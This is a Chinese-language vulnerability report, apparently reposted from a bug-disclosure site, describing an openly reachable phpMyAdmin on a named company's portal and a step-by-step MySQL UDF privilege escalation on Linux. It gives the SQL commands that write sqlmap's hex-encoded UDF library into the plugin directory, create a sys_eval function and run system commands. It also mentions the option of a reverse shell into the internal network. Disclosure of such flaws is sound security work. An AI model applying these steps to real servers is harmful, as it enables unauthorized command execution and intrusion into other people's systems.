网康科技一处配置不当导致可内网渗透 --- Linux udf提权

https://portal.netentsec.com/phpMyAdmin/

能够直接访问

网康科技一处配置不当导致可内网渗透 --- Linux udf提权_第1张图片



就不看数据库信息进系统拿shell

这次我们试试udf提权

是linux

网康科技一处配置不当导致可内网渗透 --- Linux udf提权_第2张图片



然后我们去把sqlmap的udf拿来用

在\sqlmap\udf\mysql\里面

网康科技一处配置不当导致可内网渗透 --- Linux udf提权_第3张图片



这次我们不知道系统是64位还是32位

建议先导入64位因为大多数的服务器都是64位的

先转换成16进制.

转换工具

code 区域
http://scanfsec.com/Hex.rar



网康科技一处配置不当导致可内网渗透 --- Linux udf提权_第4张图片



1.我们要得到plugin路径

执行sql语句 show variables like "%plugin%";

网康科技一处配置不当导致可内网渗透 --- Linux udf提权_第5张图片



得到路径为 /alidata/server/mysql/lib/plugin/

2.上传16udf库文件

select unhex('工具里面的16进制') into dumpfile '上面得到的路径/xxoo.so';

网康科技一处配置不当导致可内网渗透 --- Linux udf提权_第6张图片



3.加载函数

create function sys_eval returns string soname "xxoo.so";

就可以执行命令了

select sys_eval('命令');

win平台的方法一样只是导入的库文件和路径不同

网康科技一处配置不当导致可内网渗透 --- Linux udf提权_第7张图片

漏洞证明:

网康科技一处配置不当导致可内网渗透 --- Linux udf提权_第8张图片



网康科技一处配置不当导致可内网渗透 --- Linux udf提权_第9张图片



网康科技一处配置不当导致可内网渗透 --- Linux udf提权_第10张图片



就不反弹shell渗透内网了.

你可能感兴趣的:(网康科技一处配置不当导致可内网渗透 --- Linux udf提权)